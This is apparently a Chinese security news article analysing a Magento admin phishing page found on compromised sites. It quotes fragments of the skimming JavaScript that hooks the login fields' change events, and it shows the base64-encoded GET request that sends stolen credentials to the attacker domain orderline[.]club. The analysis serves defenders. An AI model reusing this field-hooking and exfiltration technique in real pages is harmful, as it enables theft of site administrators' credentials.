点击上方
蓝字
关注我们
概述
近期,研究人员在被入侵的网站上找到了名为“wp-order.php”的Magento管理员登录网络钓鱼页面。尽管该文件名有些奇特,但它仍成功加载了看起来合法的Magento 1.x 登录页面。 受害者无法轻易察觉到的是,该网站上的图形和CSS等页面元素几乎都是从orderline[.]club恶意域名加载的。收集Magento登陆凭证
该钓鱼页面使用JavaScript EventListener(addEventListener),以及用户名和登录名(密码)字段的change事件进行攻击,不需要使用单独的PHP文件或PHP函数,就可以向攻击者发送邮件,这也是研究人员经常在此类网络钓鱼页面中发现渗透利用的原因。...function rever() { try { document.getElementById('login').addEventListener('change', magetrack); } catch (err) { } try { document.getElementById('username').addEventListener('change', magetrack); } catch (err) { }...
一旦受害者输入用户和密码并点击登录框外的其它地方后,该网络钓鱼页面会自动将包含被盗登录数据的GET请求,发送到orderline[.]club/fget.php。
GET /fget.php?eyJ1cmwiOiJodHRwOi8vbG9jYWxob3N0L3dwLW9yZGVyLnBocCIsImxvZ2luIjoiYWRtaW4iLCJwYXNzIjoiYWRtaW4ifQ==
以下gif动图演示了,当用户在输入登录数据时,页面是如何发送GET请求的,无论用户是否点击登录按钮。
可以看出,被盗的登录数据使用base64进行编码,并作为查询发送给攻击者。如果从发出的GET请求中解码base64,将得到:
{"url":"http://localhost/wp-order.php","login":"admin","pass":"admin"}
总结
该代码表明攻击者仍在开发此网络钓鱼页面,因此这种渗透方式在将来的网络钓鱼页面中将变得越来越流行。END
好文!必须在看